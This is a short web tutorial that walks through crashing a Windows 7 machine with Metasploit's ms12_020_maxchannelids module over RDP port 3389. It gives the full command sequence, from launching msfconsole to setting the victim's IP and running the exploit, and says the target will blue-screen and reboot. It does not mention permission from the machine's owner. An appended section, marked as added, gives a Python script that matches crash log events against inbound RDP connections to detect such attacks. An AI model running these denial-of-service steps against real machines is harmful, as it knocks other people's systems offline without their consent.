Penetration Testing Windows 7 by Crashing the Machine Using Remote Desktop Connection Vulnerability.
This is a tutorial for penetration testing a Windows 7 machine for the Remote Desktop Connection vulnerability using everyone’s favorite exploitation framework, Metasploit. Earlier there were exploits for unpatched XP machines, but those don’t exist in modern operating systems such as Windows 7.
Generally, we have seen client-side exploits and payloads all the time for Windows 7. Social Engineering Toolkit is great for these attacks; however, Windows 7 still has a vulnerability living in it, in the RDP (Remote Desktop Protocol) service on port 3389, which is accessible over the LAN and the internet. Over the internet, this gets a little complicated due to the need for port forwarding, but over the LAN this attack is as easy as pie.
All you need to perform this penetration testing tutorial is a Kali machine and a victim Windows 7 machine.
Penetration testing Windows 7 with Kali Linux
Let’s begin the tutorial with a scenario where the victim’s Windows 7 machine is on the LAN. All we need to get started is the IP address of the Windows 7 machine, which you can easily get with either Nmap or the ipconfig command.
Start Metasploit: msfconsole
Next we need to select the exploit that we are planning to use, i.e. ms12_020_maxchannelids
Command: use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
Now if you don’t know what options this exploit needs, type the command “show options” in msfconsole. This will list all the options that need to be set for this exploit.
Set the Remote Host IP Address:
Command: set RHOST <Vict-windows 7 IP>
And you are finished!
Just type “exploit”
The target machine will get a blue screen and crash, and then it will reboot.
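On the defending side, the blue screen and reboot described above leave crash events in the target's System log, and those can be lined up against inbound connections to port 3389. The following is an added example, not part of the original tutorial: the record formats, the addresses and the five-minute window are assumptions constructed for illustration.

```python
from datetime import datetime, timedelta

RDP_PORT = 3389
# Windows System-log IDs: 1001 = BugCheck, 41 = Kernel-Power, 6008 = unexpected shutdown
CRASH_EVENT_IDS = {1001, 41, 6008}
# Assumption: these events are written on the next boot, so allow for reboot time.
WINDOW = timedelta(minutes=5)

# Constructed flow records: "time src_ip dst_ip dst_port"
FLOWS = """\
2024-05-01T10:00:05 192.0.2.10 192.0.2.50 3389
2024-05-01T10:14:58 192.0.2.77 192.0.2.50 3389
2024-05-01T10:15:30 192.0.2.10 192.0.2.51 445
2024-05-01T11:30:00 192.0.2.10 192.0.2.51 3389
"""
# Constructed crash records: "time host_ip event_id"
CRASHES = """\
2024-05-01T10:15:02 192.0.2.50 1001
2024-05-01T10:15:10 192.0.2.50 7036
2024-05-01T12:45:00 192.0.2.51 41
"""

def parse(text, kinds):
    """Split whitespace-separated records and convert each field; skip short lines."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == len(kinds):
            rows.append(tuple(kind(p) for kind, p in zip(kinds, parts)))
    return rows

def correlate(flows_text, crashes_text, window=WINDOW):
    """Return (host, time, event_id, [sources]) for crashes preceded by inbound RDP."""
    flows = parse(flows_text, (datetime.fromisoformat, str, str, int))
    crashes = parse(crashes_text, (datetime.fromisoformat, str, int))
    findings = []
    for crash_time, host, event_id in crashes:
        if event_id not in CRASH_EVENT_IDS:
            continue  # not a crash/unexpected-reboot event
        sources = sorted({src for t, src, dst, port in flows
                          if dst == host and port == RDP_PORT
                          and timedelta(0) <= crash_time - t <= window})
        if sources:
            findings.append((host, crash_time.isoformat(), event_id, sources))
    return findings

if __name__ == "__main__":
    for host, when, event_id, sources in correlate(FLOWS, CRASHES):
        print(f"{host} crashed (event {event_id}) at {when}; RDP from {sources}")
```

A crash with no RDP connection inside the window, such as the second host in the sample data, is not reported.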